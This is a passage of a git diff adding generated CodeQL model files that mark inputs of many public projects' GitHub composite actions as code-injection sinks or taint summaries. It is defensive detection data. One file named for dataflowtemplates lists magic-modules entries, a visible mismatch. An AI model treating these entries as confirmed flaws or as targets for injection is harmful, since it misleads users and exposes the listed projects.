"input.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/actions/ql/lib/ext/generated/composite-actions/expo_expo.model.yml new file mode 100644 index 000000000000..4fa53f367e41 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/actions/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml new file mode 100644 index 000000000000..f3fa29375459 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/actions/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml new file mode 100644 index 000000000000..c66fab9d129b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml new file mode 100644 index 000000000000..f7e76b691130 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml new file mode 100644 index 000000000000..a216abf29acb --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml new file mode 100644 index 000000000000..396841a6c168 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] + - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml new file mode 100644 index 000000000000..1a3f383d23b3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_version", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.python", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.cuda", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml new file mode 100644 index 000000000000..98755665d860 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/actions/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml new file mode 100644 index 000000000000..5849fe5c34f9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.report_on", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml new file mode 100644 index 000000000000..fdc8478bef74 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.pods", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.notices-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/actions/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml new file mode 100644 index 000000000000..72b9c1c870ef --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/actions/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml new file mode 100644 index 000000000000..b8688ab86d29 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/actions/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml new file mode 100644 index 000000000000..e2aacd8f10b8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-api", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-api-token", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/actions/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml new file mode 100644 index 000000000000..13f28980e573 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/actions/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml new file mode 100644 index 000000000000..ee1ef52ecd12 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/actions/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml new file mode 100644 index 000000000000..14e60d9cc19b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] + - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml new file mode 100644 index 000000000000..0516493f6bab --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml new file mode 100644 index 000000000000..62e64b63b44a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "input.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/actions/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml new file mode 100644 index 000000000000..e132ef1cee39 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] + - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/actions/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml new file mode 100644 index 000000000000..90d50a1b757a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml new file mode 100644 index 000000000000..a8b9c41363ea --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.version", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.use-all-platform-bundle", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/github_ruby.model.yml new file mode 100644 index 000000000000..75652ed69f99 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] + - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] + - ["github/ruby", "*", "input.test-opts", "code-injection", "generated"] + - ["github/ruby", "*", "input.report-path", "code-injection", "generated"] + - ["github/ruby", "*", "input.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/actions/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml new file mode 100644 index 000000000000..973007c5490c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] + - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] + - ["gittools/gitversion", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/actions/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml new file mode 100644 index 000000000000..35a1a09df590 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] + - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/actions/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml new file mode 100644 index 000000000000..6b193462780f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/actions/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml new file mode 100644 index 000000000000..448f657d97ec --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.target", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/actions/ql/lib/ext/generated/composite-actions/google_dagger.model.yml new file mode 100644 index 000000000000..009f4f1ef08e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/actions/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml new file mode 100644 index 000000000000..bcb882872150 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml new file mode 100644 index 000000000000..8476c40ceaf2 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml new file mode 100644 index 000000000000..462489a4c512 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 000000000000..56b354c870e0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/actions/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml new file mode 100644 index 000000000000..9fbb4108868d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.flags", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.path", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.bin", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/actions/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml new file mode 100644 index 000000000000..5fc85d3530e9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml new file mode 100644 index 000000000000..b0b36e7bd36c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml new file mode 100644 index 000000000000..cb2c50f440c0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-arch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-os", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml new file mode 100644 index 000000000000..7ac5c21a6138 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] + - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] + - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml new file mode 100644 index 000000000000..1276334381da --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] + - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] + - ["home-assistant/android", "*", "input.tag-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml new file mode 100644 index 000000000000..0fc27163dd09 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.signing_key", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.workflow-name", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.collapse", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.step_name", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.result_path", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.workdir", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.script", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/actions/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml new file mode 100644 index 000000000000..ae994dbad1ae --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/actions/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml new file mode 100644 index 000000000000..6930bfed43fd --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "input.k9s-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/actions/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml new file mode 100644 index 000000000000..94a802aa36f4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "input.distBaseDir", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml new file mode 100644 index 000000000000..04246517883e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/actions/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml new file mode 100644 index 000000000000..2dd758bbccb5 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.container-image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_repository", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.dnstester_image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.image_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.container_repo", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_architecture", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_distribution", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-step-conclusion", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-summary-suffix", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-log-file", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/actions/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml new file mode 100644 index 000000000000..5764bab2ebb9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml new file mode 100644 index 000000000000..bbf2f0dc3dea --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.component", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.app", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.stencil-version", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.preid", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml new file mode 100644 index 000000000000..de80b5607d86 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.output", 